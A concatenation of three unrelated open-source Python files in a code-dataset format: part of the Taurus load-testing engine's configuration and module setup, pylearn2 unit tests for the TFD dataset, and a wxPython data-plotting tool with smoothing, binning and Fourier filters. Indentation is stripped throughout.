machine_dir = get_configs_dir() # can't refactor machine_dir out - see setup.py
if os.path.isdir(machine_dir):
self.log.debug("Reading system configs from: %s", machine_dir)
for cfile in sorted(os.listdir(machine_dir)):
fname = os.path.join(machine_dir, cfile)
if os.path.isfile(fname):
configs.append(fname)
return configs
def _load_user_configs(self, user_configs):
"""
:type user_configs: list[str]
:rtype: Configuration
"""
# "tab-replacement-spaces" is not documented 'cause it loads only from base configs
# so it's sort of half-working last resort
self.config.tab_replacement_spaces = self.config.get(SETTINGS).get("tab-replacement-spaces", 4)
self.log.debug("User configs list: %s", user_configs)
self.config.load(user_configs)
user_config = Configuration()
user_config.log = self.log.getChild(Configuration.__name__)
user_config.tab_replacement_spaces = self.config.tab_replacement_spaces
user_config.warn_on_tab_replacement = False
user_config.load(user_configs, self.__config_loaded)
return user_config
def __config_loaded(self, config):
self.file_search_paths.append(get_full_path(config, step_up=1))
def __prepare_provisioning(self):
"""
Instantiate provisioning class
"""
err = TaurusConfigError("Please check global config availability or configure provisioning settings")
cls = self.config.get(Provisioning.PROV, err)
self.provisioning = self.instantiate_module(cls)
self.prepared.append(self.provisioning)
self.provisioning.prepare()
def __prepare_reporters(self):
"""
Instantiate reporters, then prepare them in case they would like to interact
"""
reporting = self.config.get(Reporter.REP, [])
for index, reporter in enumerate(reporting):
msg = "reporter 'module' field isn't recognized: %s"
cls = reporter.get('module', TaurusConfigError(msg % reporter))
instance = self.instantiate_module(cls)
instance.parameters = reporter
if self.__singletone_exists(instance, self.reporters):
continue
assert isinstance(instance, Reporter)
self.reporters.append(instance)
for reporter in self.reporters[:]:
if not reporter.should_run():
self.reporters.remove(reporter)
# prepare reporters
for module in self.reporters:
self.prepared.append(module)
module.prepare()
def __prepare_services(self):
"""
Instantiate service modules, then prepare them
"""
srv_config = self.config.get(Service.SERV, [])
services = []
for index, config in enumerate(srv_config):
cls = config.get('module', '')
instance = self.instantiate_module(cls)
instance.parameters = config
if self.__singletone_exists(instance, services):
continue
assert isinstance(instance, Service)
services.append(instance)
for service in services[:]:
if not service.should_run():
services.remove(service)
self.services.extend(services)
for module in self.services:
self.prepared.append(module)
module.prepare()
def __singletone_exists(self, instance, mods_list):
"""
:type instance: EngineModule
:type mods_list: list[EngineModule]
:rtype: bool
"""
if not isinstance(instance, Singletone):
return False
for mod in mods_list:
if mod.parameters.get("module") == instance.parameters.get("module"):
msg = "Module '%s' can be only used once, will merge all new instances into single"
self.log.warning(msg % mod.parameters.get("module"))
mod.parameters.merge(instance.parameters)
return True
return False
def __prepare_aggregator(self):
"""
Instantiate aggregators
:return:
"""
cls = self.config.get(SETTINGS).get("aggregator", "")
if not cls:
self.log.warning("Proceeding without aggregator, no results analysis")
else:
self.aggregator = self.instantiate_module(cls)
self.prepared.append(self.aggregator)
self.aggregator.prepare()
def get_http_client(self):
if self._http_client is None:
self._http_client = HTTPClient()
self._http_client.add_proxy_settings(self.config.get("settings").get("proxy"))
return self._http_client
def _check_updates(self, install_id):
if VERSION == DEV_VERSION:
return
params = (VERSION, install_id)
addr = "https://gettaurus.org/updates/?version=%s&installID=%s" % params
self.log.debug("Requesting updates info: %s", addr)
client = self.get_http_client()
try:
response = client.request('GET', addr, timeout=10)
except NETWORK_PROBLEMS:
self.log.debug("Failed to check for updates: %s", traceback.format_exc())
self.log.warning("Failed to check for updates")
return
data = response.json()
latest = data.get('latest')
needs_upgrade = data.get('needsUpgrade')
if latest is None or needs_upgrade is None:
self.log.warning(f'Wrong updates info: "{data}"')
else:
self.log.debug(f'Taurus updates info: "{data}"')
mine = LooseVersion(VERSION)
if (mine < latest) or needs_upgrade:
msg = "There is newer version of Taurus %s available, consider upgrading. " \
"What's new: http://gettaurus.org/docs/Changelog/"
self.log.warning(msg, latest)
else:
self.log.debug("Installation is up-to-date")
def eval_env(self):
"""
Should be done after `configure`
"""
envs = self.__get_envs_from_config()
envs = expand_envs_with_os(envs)
def apply_env(value, key, container):
if isinstance(value, str):
container[key] = custom_expandvars(value, envs)
BetterDict.traverse(self.config, apply_env)
self.__export_variables_to_os()
def __export_variables_to_os(self):
"""
Export all user-defined environment variables to the system.
Example:
settings:
env:
FOO: bbb/ccc
BAR: aaa
"""
envs = self.__get_envs_from_config()
for var_name in envs:
if envs[var_name] is None:
if var_name in os.environ:
os.environ.pop(var_name)
else:
os.environ[var_name] = envs[var_name]
self.log.debug("OS env: %s=%s", var_name, envs[var_name])
def __get_envs_from_config(self):
envs = self.config.get(SETTINGS, force_set=True).get("env", force_set=True)
envs[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
return envs
| apache-2.0 | 210,177,917,894,074,000 | 36.696701 | 119 | 0.588386 | false |
mclaughlin6464/pylearn2 | pylearn2/datasets/tests/test_tfd.py | 45 | 3849 | import unittest
import numpy as np
from pylearn2.datasets.tfd import TFD
from pylearn2.space import Conv2DSpace
from pylearn2.testing.skip import skip_if_no_data
class TestTFD(unittest.TestCase):
def setUp(self):
skip_if_no_data()
def test_load(self):
TFD(which_set='valid')
TFD(which_set='unlabeled')
TFD(which_set='full_train')
TFD(which_set='test', image_size=96)
TFD(which_set='test', fold=1)
TFD(which_set='test', fold=2)
TFD(which_set='test', fold=3)
TFD(which_set='test', fold=4)
def test_topo(self):
"""Tests that a topological batch has 4 dimensions"""
train = TFD(which_set='train')
topo = train.get_batch_topo(1)
assert topo.ndim == 4
def test_topo_c01b(self):
"""
Tests that a topological batch with axes ('c',0,1,'b')
can be dimshuffled back to match the standard ('b',0,1,'c')
format.
"""
test = TFD(which_set='test')
batch_size = 100
c01b_test = TFD(which_set='test', axes=('c', 0, 1, 'b'))
c01b_X = c01b_test.X[0:batch_size, :]
c01b = c01b_test.get_topological_view(c01b_X)
assert c01b.shape == (1, 48, 48, batch_size)
b01c = c01b.transpose(3, 1, 2, 0)
b01c_X = test.X[0:batch_size, :]
assert c01b_X.shape == b01c_X.shape
assert np.all(c01b_X == b01c_X)
b01c_direct = test.get_topological_view(b01c_X)
assert b01c_direct.shape == b01c.shape
assert np.all(b01c_direct == b01c)
def test_iterator(self):
# Tests that batches returned by an iterator with topological
# data_specs are the same as the ones returned by calling
# get_topological_view on the dataset with the corresponding order
test = TFD(which_set='test')
batch_size = 100
b01c_X = test.X[0:batch_size, :]
b01c_topo = test.get_topological_view(b01c_X)
b01c_b01c_it = test.iterator(
mode='sequential',
batch_size=batch_size,
data_specs=(Conv2DSpace(shape=(48, 48),
num_channels=1,
axes=('b', 0, 1, 'c')),
'features'))
b01c_b01c = b01c_b01c_it.next()
assert np.all(b01c_topo == b01c_b01c)
c01b_test = TFD(which_set='test', axes=('c', 0, 1, 'b'))
c01b_X = c01b_test.X[0:batch_size, :]
c01b_topo = c01b_test.get_topological_view(c01b_X)
c01b_c01b_it = c01b_test.iterator(
mode='sequential',
batch_size=batch_size,
data_specs=(Conv2DSpace(shape=(48, 48),
num_channels=1,
axes=('c', 0, 1, 'b')),
'features'))
c01b_c01b = c01b_c01b_it.next()
assert np.all(c01b_topo == c01b_c01b)
# Also check that samples from iterators with the same data_specs
# with Conv2DSpace do not depend on the axes of the dataset
b01c_c01b_it = test.iterator(
mode='sequential',
batch_size=batch_size,
data_specs=(Conv2DSpace(shape=(48, 48),
num_channels=1,
axes=('c', 0, 1, 'b')),
'features'))
b01c_c01b = b01c_c01b_it.next()
assert np.all(b01c_c01b == c01b_c01b)
c01b_b01c_it = c01b_test.iterator(
mode='sequential',
batch_size=batch_size,
data_specs=(Conv2DSpace(shape=(48, 48),
num_channels=1,
axes=('b', 0, 1, 'c')),
'features'))
c01b_b01c = c01b_b01c_it.next()
assert np.all(c01b_b01c == b01c_b01c)
| bsd-3-clause | -6,576,612,867,599,089,000 | 37.49 | 74 | 0.522473 | false |
jameskeaveney/Python-GUI-Interactive-Plotter | interactive_plotter.py | 1 | 24753 | #!/usr/bin/env python
import matplotlib
matplotlib.use('WxAgg')
import pylab
pylab.ioff()
from matplotlib import rc
rc('text', usetex=False)
rc('font',**{'family':'serif'})
import wx, os, sys, csv
from numpy import arange,array,pi,zeros,append,std
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg, NavigationToolbar2WxAgg as Toolbar
#sys.path.append('/Users/xbnv46/Documents/Programming/IO')
#from smoothing import smoothTriangle as smooth
#from filters import *
#from databin import bin2 as bin
#filters
from scipy.fftpack import ifft, fft, fftfreq
from numpy import random
def Amp_dist(E,Ef):
return ((1+(E/Ef)**2)**0.5)**(-1)
def lowpass(t,S,cutoff):
tstep=t[1]-t[0]
F = fft(S)
freq = fftfreq(len(t),tstep)
Foriginal = F
print freq.max(),freq.min()
for i in range(len(freq)):
if freq[i]<-cutoff or freq[i]>cutoff: F[i]=0.
Sout = ifft(F)
Sout = array(Sout)
return Sout
def better_lowpass(t,S,cutoff):
tstep=t[1]-t[0]
F = fft(S)
freq = fftfreq(len(t),tstep)
Foriginal = F
DD = Amp_dist(freq,cutoff)
F = F * DD
Sout = ifft(F)
Sout = array(Sout)
return Sout
def highpass(t,S,cutoff):
tstep=t[1]-t[0]
F = fft(S)
freq = fftfreq(len(t),tstep)
Foriginal = F
print freq.max(),freq.min()
for i in range(len(freq)):
if freq[i]>-cutoff and freq[i]<cutoff: F[i]=0.
Sout = ifft(F)
return Sout
def bandstop(t,S,lowcut,highcut):
tstep=t[1]-t[0]
F = fft(S)
freq = fftfreq(len(t),tstep)
Foriginal = F
print freq.max(),freq.min()
for i in range(len(freq)):
if (freq[i]<-lowcut and freq[i]>-highcut) or (freq[i]>lowcut and freq[i]<highcut): F[i]=0.
Sout = ifft(F)
return Sout
def bandpass(t,S,lowcut,highcut):
tstep=t[1]-t[0]
F = fft(S)
freq = fftfreq(len(t),tstep)
Foriginal = F
print freq.max(),freq.min()
for i in range(len(freq)):
if (freq[i]>-lowcut and freq[i]<lowcut) or freq[i]>highcut or freq[i]<-highcut: F[i]=0.
Sout = ifft(F)
return Sout#,freq,F,Foriginal
#Moving average smoothing
def smooth(data,degree,dropVals=False):
"""performs moving triangle smoothing with a variable degree."""
"""note that if dropVals is False, output length will be identical
to input length, but with copies of data at the flanking regions"""
triangle=array(range(degree)+[degree]+range(degree)[::-1])+1
smoothed=[]
for i in range(degree,len(data)-degree*2):
point=data[i:i+len(triangle)]*triangle
smoothed.append(sum(point)/sum(triangle))
if dropVals: return smoothed
smoothed=[smoothed[0]]*(degree+degree/2)+smoothed
j = len(data)-len(smoothed)
if j%2==1:
for i in range(0,(j-1)/2):
smoothed.append(data[-1-(j-1)/2+i])
smoothed.insert(0,data[(j-1)/2-i])
smoothed.append(data[-1])
else:
for i in range(0,j/2):
smoothed.append(data[-1-i])
smoothed.insert(0,data[i])
#print j,len(data),len(smoothed)
return array(smoothed)
#CSV reading
def read(filename,spacing=0,columns=2):
f=open(filename,'U')
fid=[]
for line in f:
fid.append(line)
f.close()
# -1: ignore last (blank) line in csv file (lecroy)
fid = fid[spacing:-1]
inData=csv.reader(fid,delimiter=',')
# spacing : skips lines if needed (e.g., on oscilloscope files)
data=[]
for i in range(0,columns): data.append([])
for row in inData:
for i in range(0,columns):
data[i].append(float(row[i]))
for i in range(0,columns):
data[i] = array(data[i])
return data
#Data Binning
def bin(x,y,blength):
if blength % 2 == 0:
print '!!!!!!'
print 'CAUTION: bin length not an odd number. errors likely to occur!'
print '!!!!!!'
nobins = len(x)/blength
xmid = (blength-1)/2
xbinmax = nobins*blength - xmid
a=0
binned=zeros((nobins,3))
xout,yout,yerrout = array([]),array([]),array([])
for i in range(int(xmid),int(xbinmax),int(blength)):
xmin=i-int(xmid)
xmax=i+int(xmid)
xout=append(xout,sum(x[xmin:xmax+1])/blength)
yout=append(yout,sum(y[xmin:xmax+1])/blength)
yerrout=append(yerrout,std(y[xmin:xmax+1]))
return xout,yout,yerrout
class MainWin(wx.Frame):
def __init__(self,parent,title):
wx.Frame.__init__(self,None,title=title,size=(1200,600))
self.Bind(wx.EVT_CLOSE,self.OnExit)
### Statusbar at the bottom of the window
self.CreateStatusBar()
panel = wx.Panel(self)
### Text window (readonly) for outputting information (debug)
### Command line for custom commands on the fly
#cmdlbl = wx.StaticText(panel,label='Command-Line: ')
#cmd = wx.TextCtrl(panel,style=wx.TE_PROCESS_ENTER)
#self.Bind(wx.EVT_TEXT_ENTER,self.OnCommand,cmd)
# H sizer:
#cmline = wx.BoxSizer(wx.HORIZONTAL)
#cmline.Add(cmdlbl,0,wx.EXPAND)
#cmline.Add(cmd,1,wx.EXPAND)
#indents for sizers
Lindent = 60
Rindent = 80
### Signal processing: smoothing
SP_label = wx.StaticText(panel,label='Signal processing:',style=wx.ALIGN_CENTRE)
font = wx.Font(14,wx.DEFAULT, wx.NORMAL,wx.NORMAL)
SP_label.SetFont(font)
# H sizer:
SP_sizer = wx.BoxSizer(wx.HORIZONTAL)
SP_sizer.Add((Lindent-15,-1),0,wx.EXPAND)
SP_sizer.Add(SP_label,0,wx.EXPAND)
SP_sizer.Add((10,-1),1,wx.EXPAND)
#moving avg:
smth_label = wx.StaticText(panel,label='Moving average smoothing')
self.smooth_amount = 11
smth_amount_label = wx.StaticText(panel,label='Factor:')
smth_amount_box = wx.TextCtrl(panel,value='11',style=wx.TE_PROCESS_ENTER,size=(50,-1))
self.Bind(wx.EVT_TEXT,self.OnSmoothCtrl,smth_amount_box)
smth_button = wx.Button(panel,wx.ID_ANY,"Smooth data",size=(150,-1))
self.Bind(wx.EVT_BUTTON,self.OnSmoothBtn,smth_button)
#H sizer:
smth_sizer = wx.BoxSizer(wx.HORIZONTAL)
smth_sizer.Add((Lindent,-1),0,wx.EXPAND)
smth_sizer.Add(smth_label,0,wx.EXPAND)
smth_sizer.Add((10,-1),1,wx.EXPAND)
smth_sizer.Add(smth_amount_label,0,wx.EXPAND)
smth_sizer.Add(smth_amount_box,0,wx.EXPAND)
smth_sizer.Add((10,-1),0,wx.EXPAND)
smth_sizer.Add(smth_button,0,wx.EXPAND)
smth_sizer.Add((Rindent,-1),0,wx.EXPAND)
#binning:
self.bin_amount = 11
bin_label = wx.StaticText(panel,label='Data binning')
bin_label.SetToolTip(wx.ToolTip("Bin large arrays into smaller array, by the chosen factor"))
bin_amount_label = wx.StaticText(panel,label='Factor (Odd!):')
bin_amount_box = wx.TextCtrl(panel,value='11',style=wx.TE_PROCESS_ENTER,size=(50,-1))
self.Bind(wx.EVT_TEXT,self.OnBinCtrl,bin_amount_box)
bin_button = wx.Button(panel,wx.ID_ANY,"Bin data",size=(150,-1))
self.Bind(wx.EVT_BUTTON,self.OnBinBtn,bin_button)
bin_sizer = wx.BoxSizer(wx.HORIZONTAL)
bin_sizer.Add((Lindent,-1),0,wx.EXPAND)
bin_sizer.Add(bin_label,0,wx.EXPAND)
bin_sizer.Add((10,-1),1,wx.EXPAND)
bin_sizer.Add(bin_amount_label,0,wx.EXPAND)
bin_sizer.Add(bin_amount_box,0,wx.EXPAND)
bin_sizer.Add((10,-1),0,wx.EXPAND)
bin_sizer.Add(bin_button,0,wx.EXPAND)
bin_sizer.Add((Rindent,-1),0,wx.EXPAND)
#filtering:
Filter_label = wx.StaticText(panel,label='Frequency filters')
freq_select = [1e0,1e3,1e6,1e9]
freq_labels = ['Hz','kHz','MHz','GHz']
self.dd = dict(Hz=1.,kHz=1e3,MHz=1e6,GHz=1e9)
self.LPa = 1.
LP_amount_label = wx.StaticText(panel,label='Low frequency cutoff:')
LP_amount_box = wx.TextCtrl(panel,value='1',
style=wx.TE_PROCESS_ENTER)
self.Bind(wx.EVT_TEXT,self.OnLPCtrl,LP_amount_box)
self.LPm = 'kHz'
self.LP_amount = self.LPa * self.dd[self.LPm]
self.LPmult = wx.ComboBox(panel,value='kHz',
choices=freq_labels,style=wx.CB_READONLY)
self.Bind(wx.EVT_COMBOBOX,self.OnLPmult,self.LPmult)
self.HPa = 1.
HP_amount_label = wx.StaticText(panel,label='High frequency cutoff:')
HP_amount_box = wx.TextCtrl(panel,value='1',style=wx.TE_PROCESS_ENTER)
self.Bind(wx.EVT_TEXT,self.OnHPCtrl,HP_amount_box)
self.HPm = 'kHz'
self.HP_amount = self.HPa * self.dd[self.HPm]
self.HPmult = wx.ComboBox(panel,value='kHz',
choices=freq_labels,style=wx.CB_READONLY)
self.Bind(wx.EVT_COMBOBOX,self.OnHPmult,self.HPmult)
freq_tooltip = "Filter the y-axis (assuming x-axis is time) using hard-edge Fourier transform frequency filters"
for item in [HP_amount_label,LP_amount_label,
HP_amount_box,LP_amount_box,self.LPmult,
self.HPmult,Filter_label]:
item.SetToolTip(wx.ToolTip(freq_tooltip))
LP_button = wx.Button(panel,wx.ID_ANY,"Low-Pass",size=(150,-1))
self.Bind(wx.EVT_BUTTON,self.OnLPBtn,LP_button)
LP_button.SetToolTip(wx.ToolTip("Filter out high-frequency noise"))
HP_button = wx.Button(panel,wx.ID_ANY,"High-Pass",size=(150,-1))
self.Bind(wx.EVT_BUTTON,self.OnHPBtn,HP_button)
HP_button.SetToolTip(wx.ToolTip("Filter out low-frequency noise/offset"))
BP_button = wx.Button(panel,wx.ID_ANY,"Band-Pass",size=(150,-1))
self.Bind(wx.EVT_BUTTON,self.OnBPBtn,BP_button)
BP_button.SetToolTip(wx.ToolTip("Pass (retain) only the frequencies between low and high"))
BS_button = wx.Button(panel,wx.ID_ANY,"Band-Stop",size=(150,-1))
self.Bind(wx.EVT_BUTTON,self.OnBSBtn,BS_button)
BS_button.SetToolTip(wx.ToolTip("Block only the frequencies between low and high. Also commonly called a 'notch' filter"))
#filter sizer:
filter_sizerV = wx.BoxSizer(wx.VERTICAL)
t1_sizer = wx.BoxSizer(wx.HORIZONTAL)
t1_sizer.Add((Lindent,-1),0,wx.EXPAND)
t1_sizer.Add(Filter_label)
t1_sizer.Add((30,-1),1,wx.EXPAND)
t1_sizer.Add(LP_amount_label,0,wx.EXPAND)
t1_sizer.Add(LP_amount_box,0,wx.EXPAND)
t1_sizer.Add((10,-1),0,wx.EXPAND)
t1_sizer.Add(self.LPmult,0,wx.EXPAND)
t1_sizer.Add((Rindent,-1),0,wx.EXPAND)
t2_sizer = wx.BoxSizer(wx.HORIZONTAL)
t2_sizer.Add((Lindent,-1),0,wx.EXPAND)
t2_sizer.Add((10,-1),1,wx.EXPAND)
t2_sizer.Add((30,-1),1,wx.EXPAND)
t2_sizer.Add(HP_amount_label,0,wx.EXPAND)
t2_sizer.Add(HP_amount_box,0,wx.EXPAND)
t2_sizer.Add((10,-1),0,wx.EXPAND)
t2_sizer.Add(self.HPmult,0,wx.EXPAND)
t2_sizer.Add((Rindent,-1),0,wx.EXPAND)
t3_sizer = wx.BoxSizer(wx.HORIZONTAL)
t3_sizer.Add((Lindent,-1),1,wx.EXPAND)
t3_sizer.Add(LP_button,0,wx.EXPAND)
t3_sizer.Add((20,-1),0,wx.EXPAND)
t3_sizer.Add(HP_button,0,wx.EXPAND)
t3_sizer.Add((Rindent,-1),0,wx.EXPAND)
t4_sizer = wx.BoxSizer(wx.HORIZONTAL)
t4_sizer.Add((Lindent,-1),1,wx.EXPAND)
t4_sizer.Add(BP_button,0,wx.EXPAND)
t4_sizer.Add((20,-1),0,wx.EXPAND)
t4_sizer.Add(BS_button,0,wx.EXPAND)
t4_sizer.Add((Rindent,-1),0,wx.EXPAND)
filter_sizerV.Add(t1_sizer,0,wx.EXPAND)
filter_sizerV.Add((-1,5),0,wx.EXPAND)
filter_sizerV.Add(t2_sizer,0,wx.EXPAND)
filter_sizerV.Add((-1,5),0,wx.EXPAND)
filter_sizerV.Add(t3_sizer,0,wx.EXPAND)
filter_sizerV.Add((-1,5),0,wx.EXPAND)
filter_sizerV.Add(t4_sizer,0,wx.EXPAND)
filter_sizerH = wx.BoxSizer(wx.HORIZONTAL)
filter_sizerH.Add(filter_sizerV,1,wx.EXPAND)
#Plot panel - canvas and toolbar
self.fig = pylab.figure(1,(4.5/2,3./2),80)
self.ax = self.fig.add_subplot(111)
self.fig.subplots_adjust(bottom=0.16)
self.canvas = FigureCanvasWxAgg(panel, wx.ID_ANY, self.fig)
self.toolbar = Toolbar(self.canvas) #matplotlib toolbar
# V sizer:
plotpanel = wx.BoxSizer(wx.VERTICAL)
plotpanel.Add(self.canvas, 1, wx.LEFT|wx.RIGHT|wx.GROW,border=0)
plotpanel.Add(self.toolbar, 0, wx.LEFT|wx.RIGHT|wx.EXPAND,border=0)
#Buttons / button bar
btnsize=30
openrawfilebutton = wx.Button(panel,label="Open Raw File",size=(-1,btnsize))
self.Bind(wx.EVT_BUTTON,self.OnOpenRawFile,openrawfilebutton)
openrawfilebutton.SetToolTip(wx.ToolTip("Open a file from an oscilloscope, with some preamble at the start of the file (configured for LeCroy files)"))
openprocfilebutton = wx.Button(panel,label="Open Processed File",size=(-1,btnsize))
self.Bind(wx.EVT_BUTTON,self.OnOpenProcFile,openprocfilebutton)
openprocfilebutton.SetToolTip(wx.ToolTip("Open a csv file with two columns and no additional formatting"))
resetbutton = wx.Button(panel,wx.ID_ANY,'Revert',size=(-1,btnsize))
self.Bind(wx.EVT_BUTTON,self.OnReset,resetbutton)
resetbutton.SetToolTip(wx.ToolTip("Revert to originally loaded data set"))
exitbutton = wx.Button(panel,wx.ID_ANY,"Exit",size=(-1,btnsize))
self.Bind(wx.EVT_BUTTON,self.OnExit,exitbutton)
#Clear Figure, Axis Labels, Axis Text Size
PP_label = wx.StaticText(panel,label='Plot parameters:',style=wx.ALIGN_CENTRE)
font = wx.Font(14,wx.DEFAULT, wx.NORMAL,wx.NORMAL)
PP_label.SetFont(font)
# H sizer:
PP_sizer = wx.BoxSizer(wx.HORIZONTAL)
PP_sizer.Add((Lindent-15,-1),0,wx.EXPAND)
PP_sizer.Add(PP_label,0,wx.EXPAND)
PP_sizer.Add((10,-1),1,wx.EXPAND)
#initialise plot param values
self.xsize=18; self.ysize=18
self.xlabel=''; self.ylabel=''
self.holdgraph=False
self.ticklabelsize=13
#create list of strings to use as sizelist
sizelist = arange(8,33).tolist()
for i in range(0,len(sizelist)): sizelist[i]=str(sizelist[i])
#xlabels and sizes
xl = wx.StaticText(panel, label="X-Axis Label: ")
self.xlab = wx.TextCtrl(panel, value="")
xfsl = wx.StaticText(panel,label="Size: ")
self.xfs = wx.ComboBox(panel,value='18', choices=sizelist,style=wx.CB_READONLY)
self.Bind(wx.EVT_TEXT,self.xtext,self.xlab)
self.Bind(wx.EVT_CHAR,self.xchange,self.xlab)
self.Bind(wx.EVT_COMBOBOX,self.OnXfs,self.xfs)
#ylabels and sizes
yl = wx.StaticText(panel, label="Y-Axis Label: ")
self.ylab = wx.TextCtrl(panel, value="")
yfsl = wx.StaticText(panel,label="Size: ")
self.yfs = wx.ComboBox(panel,value='18', choices=sizelist,style=wx.CB_READONLY)
self.Bind(wx.EVT_TEXT,self.ytext,self.ylab)
self.Bind(wx.EVT_CHAR,self.ychange,self.ylab)
self.Bind(wx.EVT_COMBOBOX,self.OnYfs,self.yfs)
#put labels/sizes together in sizer
Labels = wx.BoxSizer(wx.VERTICAL)
L1 = wx.BoxSizer(wx.HORIZONTAL)
L1.Add((10,-1),1,wx.EXPAND)
L1.Add(xl,0,wx.EXPAND)
L1.Add(self.xlab,1,wx.EXPAND)
L1.Add((10,-1),0,wx.EXPAND)
L1.Add(xfsl,0,wx.EXPAND)
L1.Add(self.xfs,0,wx.EXPAND)
L1.Add((10,-1),1,wx.EXPAND)
L2 = wx.BoxSizer(wx.HORIZONTAL)
L2.Add((10,-1),1,wx.EXPAND)
L2.Add(yl,0,wx.EXPAND)
L2.Add(self.ylab,1,wx.EXPAND)
L2.Add((10,-1),0,wx.EXPAND)
L2.Add(yfsl,0,wx.EXPAND)
L2.Add(self.yfs,0,wx.EXPAND)
L2.Add((10,-1),1,wx.EXPAND)
Labels.Add(L1,0,wx.EXPAND)
Labels.Add((-1,5),0,wx.EXPAND)
Labels.Add(L2,0,wx.EXPAND)
# scales and normalise
XFactor_lbl = wx.StaticText(panel,label='X-axis scaling factor:')
YFactor_lbl = wx.StaticText(panel,label='Y-axis scaling factor:')
self.XScale = 1
XScC = wx.TextCtrl(panel, value='1',size=(50,-1))
self.Bind(wx.EVT_TEXT,self.XScaleCtrl,XScC)
self.YScale = 1
YScC = wx.TextCtrl(panel, value='1',size=(50,-1))
self.Bind(wx.EVT_TEXT,self.YScaleCtrl,YScC)
XSc = wx.Button(panel,label="Scale x-axis",size=(100,-1))
self.Bind(wx.EVT_BUTTON,self.OnXscale,XSc)
YSc = wx.Button(panel,label="Scale y-axis",size=(100,-1))
self.Bind(wx.EVT_BUTTON,self.OnYscale,YSc)
scale_sizer = wx.BoxSizer(wx.VERTICAL)
s1 = wx.BoxSizer(wx.HORIZONTAL)
s1.Add((10,-1),1,wx.EXPAND)
s1.Add(XFactor_lbl,0,wx.EXPAND)
s1.Add(XScC,0,wx.EXPAND)
s1.Add((10,-1),0,wx.EXPAND)
s1.Add(XSc,0,wx.EXPAND)
s1.Add((10,-1),1,wx.EXPAND)
s2 = wx.BoxSizer(wx.HORIZONTAL)
s2.Add((10,-1),1,wx.EXPAND)
s2.Add(YFactor_lbl,0,wx.EXPAND)
s2.Add(YScC,0,wx.EXPAND)
s2.Add((10,-1),0,wx.EXPAND)
s2.Add(YSc,0,wx.EXPAND)
s2.Add((10,-1),1,wx.EXPAND)
scale_sizer.Add(s1,0,wx.EXPAND)
scale_sizer.Add((-1,5),0,wx.EXPAND)
scale_sizer.Add(s2,0,wx.EXPAND)
#normalise
Norm_lbl = wx.StaticText(panel,label='Normalise by:')
normlist = ['Peak','Area']
self.NormType = wx.ComboBox(panel,value=normlist[0],
choices=normlist,style=wx.CB_READONLY)
NormBtn = wx.Button(panel,label='Normalise Y-data',size=(170,-1))
self.Bind(wx.EVT_BUTTON,self.OnNorm,NormBtn)
normTT = "Peak: normalise so that the peak value of the data is 1.\
Area: normalise so that the integrated area of the data is 1."
for item in [Norm_lbl,self.NormType,NormBtn]:
item.SetToolTip(wx.ToolTip(normTT))
norm_sizer = wx.BoxSizer(wx.HORIZONTAL)
norm_sizer.Add((10,-1),1,wx.EXPAND)
norm_sizer.Add(Norm_lbl,0,wx.EXPAND)
norm_sizer.Add((10,-1),0,wx.EXPAND)
norm_sizer.Add(self.NormType,0,wx.EXPAND)
norm_sizer.Add((10,-1),0,wx.EXPAND)
norm_sizer.Add(NormBtn,0,wx.EXPAND)
norm_sizer.Add((10,-1),1,wx.EXPAND)
#clear figure tickbox
OptionClear=wx.CheckBox(panel,label='Clear Figure on Update?')
self.Bind(wx.EVT_CHECKBOX,self.OnClear,OptionClear)
OptionClear.SetValue(True)
OptionClear.SetToolTip(wx.ToolTip("Like the holdoff command in MATLAB"))
#Log scale tickboxes
self.logX = False
self.logY = False
LogXTickBox = wx.CheckBox(panel,label='Logarithmic X-axis')
LogYTickBox = wx.CheckBox(panel,label='Logarithmic Y-axis')
self.Bind(wx.EVT_CHECKBOX,self.OnLogX,LogXTickBox)
self.Bind(wx.EVT_CHECKBOX,self.OnLogY,LogYTickBox)
log_sizer = wx.BoxSizer(wx.HORIZONTAL)
log_sizer.Add((10,-1),1,wx.EXPAND)
log_sizer.Add(LogXTickBox,0,wx.EXPAND)
log_sizer.Add((40,-1),0,wx.EXPAND)
log_sizer.Add(LogYTickBox,0,wx.EXPAND)
log_sizer.Add((10,-1),1,wx.EXPAND)
# open file / exit buttons
buttonbar = wx.BoxSizer(wx.HORIZONTAL)
buttonbar.Add((20,-1),0,wx.EXPAND)
buttonbar.Add(openprocfilebutton,0,
wx.RIGHT,border=15)
buttonbar.Add(openrawfilebutton,0,wx.RIGHT,border=20)
buttonbar.Add((10,-1),1,wx.EXPAND)
buttonbar.Add(resetbutton,0,wx.RIGHT,border=15)
buttonbar.Add(exitbutton,0,wx.RIGHT,border=20)
optionbar = wx.BoxSizer(wx.HORIZONTAL)
optionbar.Add((10,-1),1,wx.EXPAND)
optionbar.Add(OptionClear,0,wx.EXPAND|wx.LEFT|wx.RIGHT,border=20)
optionbar.Add((10,-1),1,wx.EXPAND)
#cmdline = wx.BoxSizer(wx.HORIZONTAL)
#cmdline.Add((10,-1),1,wx.EXPAND)
#cmdline.Add(cmline,1,wx.EXPAND|wx.LEFT|wx.RIGHT,border=20)
#cmdline.Add((10,-1),1,wx.EXPAND)
#### Main sizer::
left = wx.BoxSizer(wx.VERTICAL)
left.Add(plotpanel,1,wx.EXPAND,border=0)
right = wx.BoxSizer(wx.VERTICAL)
right.Add((-1,10),0,wx.EXPAND)
right.Add(PP_sizer,0,wx.EXPAND)
right.Add((-1,10))
right.Add(Labels,0,wx.EXPAND)
right.Add((-1,10))
right.Add(optionbar,0,wx.EXPAND)
right.Add((-1,10))
right.Add(scale_sizer,0,wx.EXPAND)
right.Add((-1,10))
right.Add(norm_sizer,0,wx.EXPAND)
right.Add((-1,10))
right.Add(log_sizer,0,wx.EXPAND)
right.Add((-1,25))
right.Add(SP_sizer,0,wx.EXPAND)
right.Add((-1,10))
right.Add(bin_sizer,0,wx.EXPAND)
right.Add((-1,10))
right.Add(smth_sizer,0,wx.EXPAND)
right.Add((-1,10))
right.Add(filter_sizerH,0,wx.EXPAND)
right.Add((-1,40),1,wx.EXPAND)
right.Add(buttonbar,0,wx.EXPAND)
finalsizer = wx.BoxSizer(wx.HORIZONTAL)
finalsizer.Add(left,1,wx.EXPAND)
finalsizer.Add(right,0,wx.EXPAND)
panel.SetSizer(finalsizer)
panel.Layout()
#
##
###################### Actions for events... #############################
##
#
def OnAbout(self,event):
dlg = wx.MessageDialog(self,'Plotting Program','What is this?',wx.OK)
dlg.ShowModal()
dlg.Destroy()
def OnReset(self,event):
self.x = self.xo
self.y = self.yo
self.ax.set_autoscale_on(True)
self.graph_update(self.x,self.y)
self.ax.set_autoscale_on(False)
